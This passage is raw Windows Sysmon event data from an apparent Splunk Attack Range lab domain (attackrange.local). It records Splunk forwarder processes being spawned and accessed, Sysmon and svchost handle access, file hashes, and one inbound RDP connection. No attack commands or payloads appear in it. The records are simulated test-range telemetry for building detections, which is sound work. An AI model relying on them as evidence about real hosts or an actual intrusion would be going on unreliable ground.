Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.184{466BC892-F3A6-60EB-057D-00000000CF01}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.728{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88B7A9A6F34AB5ABAE6618600C181EA4,SHA256=74EDC32F77B2A488E6445246D4EC3639EC11F6BF7BB537C267982F39F16C8804,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.597{466BC892-F3A7-60EB-077D-00000000CF01}96688124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.413{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A7-60EB-077D-00000000CF01}9668C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:51.397{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:51.397{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3A7-60EB-077D-00000000CF01}9668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A7-60EB-077D-00000000CF01}9668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.398{466BC892-F3A7-60EB-077D-00000000CF01}9668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3270FB3230F6C5E1E1F808976FD74334,SHA256=999291B43BF43EB43AC4C4D5A1A546F9961EC107B8705D54DB012210C15EFDFB,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000806763Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:50.494{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse62.80.172.54-56974-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806762Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:51.206{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0118FD03F78E5DB5AE9189E2A48E1DC7,SHA256=B1B7314BEDAD40C2835A37A4B0BE0BDC3F76000CCD66CA3850B379D058967F80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047223Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A8-60EB-097D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047222Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:52.766{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047221Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047220Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:52.766{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047219Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047218Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:52.766{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3A8-60EB-097D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047217Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.766{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A8-60EB-097D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047216Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.761{466BC892-F3A8-60EB-097D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows 
(R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047215Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.412{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3727CAF1BE768B799778AA719B0ED0F2,SHA256=FB66C54E8AE9F39B49D3264D44FE72A65B42D86B06AE1F6199A1C8A2C4A0C35B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806766Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:52.659{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA3587ADE22FA55F9C7B033593FF2E72,SHA256=EF450D869872E4B738411B1A8B7EE1F4F2AAF509984AE6168D52BE0E22C60CD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806765Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:52.659{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=357FDD3B4763C03C1849EA6F2E953C28,SHA256=EEB9D79DEED58F23C85FCC151DE94A03EB50F62DCEE358D64643E92740CE579B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806764Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:52.222{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38A4BD72AB1EDE547A5E0C6D5C8CA0D3,SHA256=E1F62DE68BE2C488E189519DE2C87C9C3851966895878F00FE46192087B400E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047214Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.297{466BC892-F3A8-60EB-087D-00000000CF01}101448252C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.097{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A8-60EB-087D-00000000CF01}10144C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.097{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:47:52.097{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:52.097{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
